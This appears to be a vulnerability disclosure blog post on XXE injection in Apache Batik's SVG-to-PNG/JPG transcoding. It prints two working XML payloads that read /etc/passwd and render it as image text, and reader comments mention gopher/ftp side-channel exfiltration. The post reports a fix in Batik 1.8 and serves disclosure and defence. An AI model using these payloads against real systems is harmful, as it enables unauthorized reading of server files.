In this particular case the web application offers its clients to upload a scalable vector graphics document (SVG file ) and receive the contents of the file as a rasterized JPG or PNG file. Due to the fact that SVG files use XML for its representation the parsing routine is potentially prone to XXE injection attacks. As I digged deeper I found out that a third party library called [i]Apache XMLgraphics Batik[/i] is used for the parsing and the conversion of the svg files, so I implemented a small sample application  which uses the SVG to PNG/JPG transcoding classes in the same way the investigated web application does. Now I had to find a payload that would extract data from the targets filesystem so first I tried the following:
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
As no exception was raised I recognized that everything worked well, but the resulting JPG/PNG file was empty. This happened because my payload indeed lead to the evaluation of the external reference (/etc/passwd) but the result was not returned, so I had to find a way to return the contents of it. Fortunately SVG offers the possibility to place text into images with the tag so my modified payload looked like this:
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-family="Verdana" font-size="16" x="10" y="40">&xxe;</text></svg> which results in a JPG file like this:
This works with all versions of Apache Batik (1.0 – 1.7).
The response disclosure process with Apache was very nice, fast and professional. After two e-mail exchanges they provided a fix (Batik version 1.8) which disables the evaluation of external entities.
The security advisory can be downloaded here .
 https://www.ernw.de/download/xxe_batik.tar.xz (SHA1: 7fe692922ca150a8aa20b2469ab20f8b8dc85543)
Quick note. The use of side channel ex-filtration is very useful on this specific case. New line are invisible when put in SVG text node. The gopher/ftp trick allow you to list directory and read files with ease.
I exploited this same vulnerability last year. Good job on reporting it!